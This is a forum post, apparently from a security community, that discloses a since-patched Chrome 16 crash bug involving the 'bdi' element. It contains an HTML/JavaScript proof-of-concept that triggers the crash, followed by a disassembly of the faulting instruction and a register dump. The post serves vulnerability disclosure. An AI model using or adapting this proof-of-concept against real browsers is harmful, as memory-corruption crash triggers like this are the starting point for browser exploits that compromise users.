Patched in Chrome 17.0.963.46 m. Independently discovered by a fuzzer written by me, but alas google team quickly patched the bug.
The bug was in improper processing of the child "bdi" tag.
Team : Legion Of Xtremers
Special Thanx To : Secfence
Code:
<html>
<head><title>
Chrome "16.0.912.77 m" crash
</title></head>
<body>
<script>
var alfa = document.createElement("a");
alfa.code=unescape("% u 4141% u 4141");
var beta = null;
var gamma = null;
beta = document.body.appendChild(alfa);
beta.outerHTML+=alfa.code;
// beta.innerHTML+=alfa.code;
gamma = document.createElement("bdi");
beta.t1 = document.body.appendChild(gamma);
</script>
</body>
</html>
Code:
6A9C03D3 EB 11 JMP SHORT chrome_1.6A9C03E6
6A9C03D5 8B49 10 MOV ECX,DWORD PTR DS:[ECX+10]
6A9C03D8 3951 10 CMP DWORD PTR DS:[ECX+10],EDX
6A9C03DB ^75 F8 JNZ SHORT chrome_1.6A9C03D5
6A9C03DD 8BBD 74FFFFFF MOV EDI,DWORD PTR SS:[EBP-8C]
6A9C03E3 8979 10 MOV DWORD PTR DS:[ECX+10],EDI
6A9C03E6 8B4A 10 MOV ECX,DWORD PTR DS:[EDX+10]
6A9C03E9 8BBD 78FFFFFF MOV EDI,DWORD PTR SS:[EBP-88]
6A9C03EF 894F 10 MOV DWORD PTR DS:[EDI+10],ECX // Crash occurs here
6A9C03F2 3950 04 CMP DWORD PTR DS:[EAX+4],EDX
6A9C03F5 75 09 JNZ SHORT chrome_1.6A9C0400
6A9C03F7 8B8D 78FFFFFF MOV ECX,DWORD PTR SS:[EBP-88]
6A9C03FD 8948 04 MOV DWORD PTR DS:[EAX+4],ECX
6A9C0400 3950 08 CMP DWORD PTR DS:[EAX+8],EDX
6A9C0403 75 09 JNZ SHORT chrome_1.6A9C040E
6A9C0405 8B8D 7CFFFFFF MOV ECX,DWORD PTR SS:[EBP-84]
6A9C040B 8948 08 MOV DWORD PTR DS:[EAX+8],ECX
6A9C040E 8B4D 80 MOV ECX,DWORD PTR SS:[EBP-80]
Code:
EAX 0034ECE8
ECX 0432DA9C
EDX 0432DABC
EBX 0034ED14
ESP 0034E9F0
EBP 0034EB34
ESI 00000000
EDI 00000000
EIP 6A9C03EF chrome_1.6A9C03EF
4Likes
LinkBack URL
About LinkBacks
Reply With Quote
Posting Permissions
Research Resources for MS...
Today, 12:25 PM in Web Application Penetration Testing